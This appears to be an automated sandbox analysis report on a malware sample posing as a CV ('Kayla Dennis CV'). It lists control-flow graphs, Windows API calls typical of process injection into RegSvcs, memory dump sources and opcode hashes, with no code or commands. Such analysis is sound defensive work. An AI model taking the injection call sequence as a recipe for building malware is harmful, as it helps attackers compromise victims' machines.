                                                control_flow_graph 622 7d7c958-7d7c9a6 624 7d7c9b6-7d7c9f5 WriteProcessMemory 622->624 625 7d7c9a8-7d7c9b4 622->625 627 7d7c9f7-7d7c9fd 624->627 628 7d7c9fe-7d7ca2e 624->628 625->624 627->628
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07D7C9E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: b5ccecbc1dc28917ddacbfda7959408b60096cc79bc1912c6303c238c6f11140
                                                • Instruction ID: bef243ae12a8e629947349576a251208da4995f8a24515b79b79d20717419d04
                                                • Opcode Fuzzy Hash: b5ccecbc1dc28917ddacbfda7959408b60096cc79bc1912c6303c238c6f11140
                                                • Instruction Fuzzy Hash: 6E2119B19003599FCB10DFAAC985BEEBBF5FF48310F10842AE959A7250D7789944CBA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 632 7d7c7b8-7d7c80b 635 7d7c80d-7d7c819 632->635 636 7d7c81b-7d7c84b Wow64SetThreadContext 632->636 635->636 638 7d7c854-7d7c884 636->638 639 7d7c84d-7d7c853 636->639 639->638
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D7C83E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: c95d723af7b0100d00990fd8484cdc8851454a347cc30ae9b308010e69ff0197
                                                • Instruction ID: a045633ffe1a0ccac7acf860d46052811203f55cd4d07285706e324d9f3a24c3
                                                • Opcode Fuzzy Hash: c95d723af7b0100d00990fd8484cdc8851454a347cc30ae9b308010e69ff0197
                                                • Instruction Fuzzy Hash: 492139B1D002098FDB10DFAAC4857EEBBF4EF48310F14842AD559A7240D7789945CFA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 643 7d7ca41-7d7cad5 ReadProcessMemory 646 7d7cad7-7d7cadd 643->646 647 7d7cade-7d7cb0e 643->647 646->647
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07D7CAC8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: a9ecb72aa83e4d2a127144d54a79c859176834b803d7a8b3f659b643c9e48e3a
                                                • Instruction ID: cd771254c1bbf1de47d16135ecb8c68d719c03673d441f8245a7af8b30a39a91
                                                • Opcode Fuzzy Hash: a9ecb72aa83e4d2a127144d54a79c859176834b803d7a8b3f659b643c9e48e3a
                                                • Instruction Fuzzy Hash: 102148B1C002599FCB10DFAAC985AEEFBF5FF48310F14882EE519A7250D7799945CBA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 651 7d7c7c0-7d7c80b 653 7d7c80d-7d7c819 651->653 654 7d7c81b-7d7c84b Wow64SetThreadContext 651->654 653->654 656 7d7c854-7d7c884 654->656 657 7d7c84d-7d7c853 654->657 657->656
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07D7C83E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: ed0005801dbd3fb3d8dcc044e8e2a65e3677b22f767fd38dcf9ce7f9ff321c15
                                                • Instruction ID: 75d690ec403c3d3df32b50ce0ce7ead56af0e6e7d451e929af8e8031d6109154
                                                • Opcode Fuzzy Hash: ed0005801dbd3fb3d8dcc044e8e2a65e3677b22f767fd38dcf9ce7f9ff321c15
                                                • Instruction Fuzzy Hash: 6E2115B1D002098FDB10DFAAC5857AEFBF4EF88324F14842AD519A7240DB78A944CFA1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 661 7d7ca48-7d7cad5 ReadProcessMemory 664 7d7cad7-7d7cadd 661->664 665 7d7cade-7d7cb0e 661->665 664->665
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07D7CAC8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 6b80b93850f6c6aca8da2ae4d32dfd96fc9727171b9301b9ba8878090e272bc4
                                                • Instruction ID: 00b8c2e11d98cc41369e185b6f1a71cde2ab8583b5f3cc1f03a44d49e910f8ff
                                                • Opcode Fuzzy Hash: 6b80b93850f6c6aca8da2ae4d32dfd96fc9727171b9301b9ba8878090e272bc4
                                                • Instruction Fuzzy Hash: DA2137B1C003499FCB10DFAAC985AEEFBF5FF48310F10882AE519A7250D7789940CBA0
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 018AE667
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2129867289.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_18a0000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 34067b7655d28f2d3c554014916bb9f00f6754f19d3fa579d5d5fa5b314d0acf
                                                • Instruction ID: e29704b39077f536c85ad2528db788034548411a76978d7dbeafb9086373faa4
                                                • Opcode Fuzzy Hash: 34067b7655d28f2d3c554014916bb9f00f6754f19d3fa579d5d5fa5b314d0acf
                                                • Instruction Fuzzy Hash: 5821D3B59002489FDB10CFAAD984ADEFFF9FB48310F14841AE918A3350D378A944CFA5
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07D7C906
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 11d8882fd748312f4bf8990df69ddfa46e8d7e4575125bed2a36a16ede3c0b05
                                                • Instruction ID: 2e046696c82f3a8e476180dd0fafcaaf6bd1afe3baa68a5069ca955ee6232d1b
                                                • Opcode Fuzzy Hash: 11d8882fd748312f4bf8990df69ddfa46e8d7e4575125bed2a36a16ede3c0b05
                                                • Instruction Fuzzy Hash: 551147B19002499FCB10DFAAD845BEFBFF9EF48320F148419E519A7250DB799980CBA1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 571b3c2c6f1a19c8f0bc251fc5ba780d93a4b483f12e44102342a29f79ac83a2
                                                • Instruction ID: 6f5556efde64d7b74edb748e346fe81dbdbc038db0ee372465371ba0bef29fb2
                                                • Opcode Fuzzy Hash: 571b3c2c6f1a19c8f0bc251fc5ba780d93a4b483f12e44102342a29f79ac83a2
                                                • Instruction Fuzzy Hash: 5A1149B19042498FCB20DFAAC4457DEFFF4AF89320F148419D559A7250DB79A944CFA1
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07D7C906
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: e43e534b4b89c0e9ebd8c7c6892013668b0cc4f29266168ab86569d92e6f91a2
                                                • Instruction ID: 924845ab665905c6e95d5904a07d04f71abc39f89480aa7d716c6de23af7ea13
                                                • Opcode Fuzzy Hash: e43e534b4b89c0e9ebd8c7c6892013668b0cc4f29266168ab86569d92e6f91a2
                                                • Instruction Fuzzy Hash: D21126B19002499FCB10DFAAC845AEFFFF5EF48320F148419E519A7250D779A540CBA0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 274bdc3894550b3764419309684c2496701d08078c97ca78189ec5351190837d
                                                • Instruction ID: 1043880dc3c8f4911c9d48a0935d334528ac1d85426e2d76b3c10936dd993b0b
                                                • Opcode Fuzzy Hash: 274bdc3894550b3764419309684c2496701d08078c97ca78189ec5351190837d
                                                • Instruction Fuzzy Hash: 4E1136B1D002498FCB20DFAAC4457AFFBF9EF88320F248419D519A7250DB79A944CFA0
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 018AC366
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2129867289.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_18a0000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: dde6ae0b11a0bc9e53fd5d60ece258a921c74c5451494bbc4482fe5032364d9e
                                                • Instruction ID: c48cc50b16ad78cbcd5c7481465afd87cfa7e6570d1efde18497b8df2064dccf
                                                • Opcode Fuzzy Hash: dde6ae0b11a0bc9e53fd5d60ece258a921c74c5451494bbc4482fe5032364d9e
                                                • Instruction Fuzzy Hash: A2110FB5C003498FDB10DF9AC444B9EFBF4AB89310F10841AD528B7210C379A645CFA1
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 0B1D12AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2143416006.000000000B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B1D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b1d0000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: f5b4e3c81ab14d5ad6e0b88fb07eca36feee56ecea21ee573607599336039164
                                                • Instruction ID: 44df949d9d7b83fe7dab45813276ca6a24251b1ec0a36ad29cb39993bf4934a5
                                                • Opcode Fuzzy Hash: f5b4e3c81ab14d5ad6e0b88fb07eca36feee56ecea21ee573607599336039164
                                                • Instruction Fuzzy Hash: 6711F5B58003499FCB10DF9AD545BDEBBF8EB48320F248459D518B7210D379A944CFA1
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 0B1D12AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2143416006.000000000B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B1D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b1d0000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 975d2d28b4a2ee687fd295661318005a94fc580c8dadbb7c7356552ff2017f49
                                                • Instruction ID: 79d408189060453d7b950837831714caf8f3bface5d5064fe98e06c96a884493
                                                • Opcode Fuzzy Hash: 975d2d28b4a2ee687fd295661318005a94fc580c8dadbb7c7356552ff2017f49
                                                • Instruction Fuzzy Hash: 2A11D3B58003499FDB10DF9AD585BDEFBF8EB48320F208459D518B7210C379A544CFA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2129066060.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_185d000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 829ccdecb547d28e82fd29f7e1c2f322972912c6365326ae5aa4679e92b239bb
                                                • Instruction ID: df933aa42b313c7df112e9a1a99a7ce0a3e6fa7be08b1478459b60439e9f2b98
                                                • Opcode Fuzzy Hash: 829ccdecb547d28e82fd29f7e1c2f322972912c6365326ae5aa4679e92b239bb
                                                • Instruction Fuzzy Hash: 4B210071504204EFDB45DF98C5C0B26BB65FB88364F20C66DDC098B356C37AE906CAA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2129066060.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_185d000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1e11ff865b05dc986da6486fd1f75adb8bca501e83c666fc7e90606eb5f953c
                                                • Instruction ID: fb28a4f884e484f307c278db8434a790e7566abd581b26883278c9df763dbd53
                                                • Opcode Fuzzy Hash: f1e11ff865b05dc986da6486fd1f75adb8bca501e83c666fc7e90606eb5f953c
                                                • Instruction Fuzzy Hash: 39210071604204DFDB55DF68D9C0B26BF65EB88314F20C669DD0A8B356C33AD507CA62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2129066060.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_185d000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b5e79c735fc070dab10e739e391893253070069c1ae96aa3f5c515fa7539435
                                                • Instruction ID: bfeaa46c7393c974b5d7926b7345fdde2d0778611ef9278c1824988866e7fedf
                                                • Opcode Fuzzy Hash: 9b5e79c735fc070dab10e739e391893253070069c1ae96aa3f5c515fa7539435
                                                • Instruction Fuzzy Hash: BB2192755093808FDB03CF24D994715BF71EB46314F28C6EADC498B6A7C33A950ACB62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2129066060.000000000185D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0185D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_185d000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                • Instruction ID: b8d71c3119b7f00c5f7127d596d5300d28826d782e1f9065d376dc90e7d8a795
                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                • Instruction Fuzzy Hash: DA11DD75504280DFDB02CF54D5C4B15BFA2FB88324F24C6ADDC498B656C33AE54ACBA2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2128078778.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_184d000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 73a7731f75ff6f8f83b3684f8ccda204cfba67e9c77cb8d550dc65771b40cf05
                                                • Instruction ID: ec2df6ff85a7858fd7021c5270d2014f4153f7f1e699aa4138dd6295a744dd9e
                                                • Opcode Fuzzy Hash: 73a7731f75ff6f8f83b3684f8ccda204cfba67e9c77cb8d550dc65771b40cf05
                                                • Instruction Fuzzy Hash: 7B01FC310043889BE720CA99CD84B66BF9CEF65324F18C516ED084A247C7799540C671
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2128078778.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_184d000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 685f106f81c0b544d42c11ab76abad5b91d5c01e9b6e076175de813605ae8cfe
                                                • Instruction ID: 0a7554ef5d76cbb4cf54811a1e5a4803d32440b68b0fb55c65d9b2617d533614
                                                • Opcode Fuzzy Hash: 685f106f81c0b544d42c11ab76abad5b91d5c01e9b6e076175de813605ae8cfe
                                                • Instruction Fuzzy Hash: 3FF062714043889EE7218A1ADD84B62FFA8EF65724F18C55AED484A297C3799844CAB1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed2dcef17117f14ac8290467d06267833c2509ba0bccc7bec3cce377be66042f
                                                • Instruction ID: 67e422e8fa841ebe6c41c152c33d65ecf3c73a1d7876149f91c66d6f818065c2
                                                • Opcode Fuzzy Hash: ed2dcef17117f14ac8290467d06267833c2509ba0bccc7bec3cce377be66042f
                                                • Instruction Fuzzy Hash: 31E1F5B4E042598FDB14CFA8C5809AEFBB2BF89305F64C169D404AB356D731AD81CFA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95863037cabc3dc13b78a579e44cac40fdb13a3ec982660955560764cf4613fe
                                                • Instruction ID: 840fab893a0c5f3d907f2fdf9b24411ca257ad1ab614049709c2169aa677d191
                                                • Opcode Fuzzy Hash: 95863037cabc3dc13b78a579e44cac40fdb13a3ec982660955560764cf4613fe
                                                • Instruction Fuzzy Hash: 2AE1F5B4E141598FDB14DFA8C5809AEFBB2FF89305F24C169D814AB356D731A981CFA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29e131b6275b7189a2d661b3cf44c40ade62c0efc1b72598ae3b8caa1a4362ad
                                                • Instruction ID: 2c8e15a2ce55154c5526a99f5d404614824c625a7e6f8b424f49e39b410afb54
                                                • Opcode Fuzzy Hash: 29e131b6275b7189a2d661b3cf44c40ade62c0efc1b72598ae3b8caa1a4362ad
                                                • Instruction Fuzzy Hash: 49E1E9B4E141598FDB14CFA8C5809AEFBB6FF89305F248169D818AB355D731AD81CFA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 192188fbd8f93f6cdf1a11767a1746baa6af455f15aecc2c5a1c682a7354a04a
                                                • Instruction ID: 18562e1e7f5f3534270285f998dbdf31bfbabb94210f959dd1a3303deaed4ff9
                                                • Opcode Fuzzy Hash: 192188fbd8f93f6cdf1a11767a1746baa6af455f15aecc2c5a1c682a7354a04a
                                                • Instruction Fuzzy Hash: E0E1E5B4E141198FDB14DFA8C5809AEFBB2FF89305F24C169D414AB356D731A981CFA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab308731ba43bc606491174d78b0057dcf4139d10599780eaef17c66c4043334
                                                • Instruction ID: 95de88dbe635812a72cd283ff601a62e87b284931cea1ab313bf714a94544a5f
                                                • Opcode Fuzzy Hash: ab308731ba43bc606491174d78b0057dcf4139d10599780eaef17c66c4043334
                                                • Instruction Fuzzy Hash: 8FE1F6B4E101198FDB14CFA8C6809AEFBB2FF89305F64C169D414AB356D731A981CFA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31f3e76e9aeae453e24ba857db3c05854cf9dae1957fc4549109e65ce19213aa
                                                • Instruction ID: 804fe6fe1a817cb732501009e8be260afe55763731293dd93727107f3787ff8e
                                                • Opcode Fuzzy Hash: 31f3e76e9aeae453e24ba857db3c05854cf9dae1957fc4549109e65ce19213aa
                                                • Instruction Fuzzy Hash: 54E12631D2075A8ADB21EB64D950A9DF7B1FF95300F10CB9AD50A77224EF706AC8CB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 01832696b263e679825758d19d77752e8f766200774ffca570f599f6ff28e954
                                                • Instruction ID: cf6febf7ed0d56635cb079dd8370f450bebd0cda137c0c59d173e51afa09f1fc
                                                • Opcode Fuzzy Hash: 01832696b263e679825758d19d77752e8f766200774ffca570f599f6ff28e954
                                                • Instruction Fuzzy Hash: 63D12531D2075A8ADB20EF64D950A9DB771FF95300F50CB9AE50A77224EF706AC8CB81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2142227272.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d70000_Kayla Dennis CV.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8143049d8cacd0ffa92c1afcdbaafeb88f1aeafeb41f3c676b0e3ad93e1792fa
                                                • Instruction ID: 66cb3739b28df9d2e4b8ebc471f88458c8f234e4dfe7efc702fcb2eb0ee99a12
                                                • Opcode Fuzzy Hash: 8143049d8cacd0ffa92c1afcdbaafeb88f1aeafeb41f3c676b0e3ad93e1792fa
                                                • Instruction Fuzzy Hash: 61510AB0E142198FDB14CFA9C9805AEFBF2FF89301F64C16AD408A7256D7359941CFA1

                                                Execution Graph

                                                Execution Coverage:21.8%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:8
                                                Total number of Limit Nodes:0
                                                execution_graph 11304 12fced8 11305 12fcee4 11304->11305 11308 12fd460 11305->11308 11306 12fcf21 11309 12fd464 11308->11309 11312 12fbb48 11309->11312 11314 12ff1e0 MoveFileExW 11312->11314 11315 12fd53f 11314->11315 11315->11306

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1122 12ff138-12ff140 1123 12ff167-12ff1da 1122->1123 1124 12ff142-12ff144 1122->1124 1139 12ff1dd-12ff23f 1123->1139 1140 12ff1dc 1123->1140 1125 12ff14a-12ff150 1124->1125 1126 12ff146-12ff148 1124->1126 1129 12ff163-12ff166 1125->1129 1126->1125 1128 12ff152-12ff155 1126->1128 1130 12ff15b-12ff15c 1128->1130 1131 12ff157-12ff159 1128->1131 1130->1129 1131->1129 1142 12ff253-12ff25e 1139->1142 1143 12ff241-12ff250 1139->1143 1140->1139 1144 12ff272-12ff2c5 MoveFileExW 1142->1144 1145 12ff260-12ff26f 1142->1145 1143->1142 1146 12ff2ce-12ff30c 1144->1146 1147 12ff2c7-12ff2cd 1144->1147 1145->1144 1147->1146
                                                APIs
                                                • MoveFileExW.KERNELBASE(?,?,?,?), ref: 012FF2B5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3285141788.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_12f0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID: Hnq
                                                • API String ID: 3562171763-2896580000
                                                • Opcode ID: b60eaf09c55f0125c937ed60ac6f604611f18d15b62cf20d306b3eae7d4c4929
                                                • Instruction ID: 38b94750ec63272b073afa3090e0249a4bb6eef63c7b5af4df15102b43f57b6d
                                                • Opcode Fuzzy Hash: b60eaf09c55f0125c937ed60ac6f604611f18d15b62cf20d306b3eae7d4c4929
                                                • Instruction Fuzzy Hash: 0E511575E01249DFCB14CFA9DA84AAEFBF2BF89300F24806AD509AB354D7349946CB50
                                                APIs
                                                • MoveFileExW.KERNELBASE(?,?,?,?), ref: 012FF2B5
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3285141788.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_12f0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID:
                                                • API String ID: 3562171763-0
                                                • Opcode ID: a3c8103e5401c7828abad7d9a10ad0bd5c9fa0d0b58f739f31f3fd2072ba40e3
                                                • Instruction ID: f78cdd6b463eb7cc69e0fa025d98c1634618555be4e26fe38938ab4c03fab45e
                                                • Opcode Fuzzy Hash: a3c8103e5401c7828abad7d9a10ad0bd5c9fa0d0b58f739f31f3fd2072ba40e3
                                                • Instruction Fuzzy Hash: 864189B9D102589FCB10CFA9D984A9EFBF1BB49310F24802AE918B7324D374A945CF94
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3283997731.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_121d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13dff36922560e620d13b38420839d3b67c37a5de9a8d0bfa61000d8972918af
                                                • Instruction ID: 42eca0166f08a85b4b9bf96e621cec348d50b77a91686de4e6be1b777804fe89
                                                • Opcode Fuzzy Hash: 13dff36922560e620d13b38420839d3b67c37a5de9a8d0bfa61000d8972918af
                                                • Instruction Fuzzy Hash: 0C213771514208DFCB15CF68C9C8B26BBA5FB94314F20C56DE9490B35AC77BD846CA61
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3283997731.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_121d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                • Instruction ID: d1131925a4083e95f1a06211554e7339219e9b1c4607e38ddd66497808f8847e
                                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                • Instruction Fuzzy Hash: 3911DD75504288CFDB12CF68C9C8B15BFA2FB84314F24C6A9D9494B256C33AD44ACF62

                                                Execution Graph

                                                Execution Coverage:11.3%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:185
                                                Total number of Limit Nodes:13
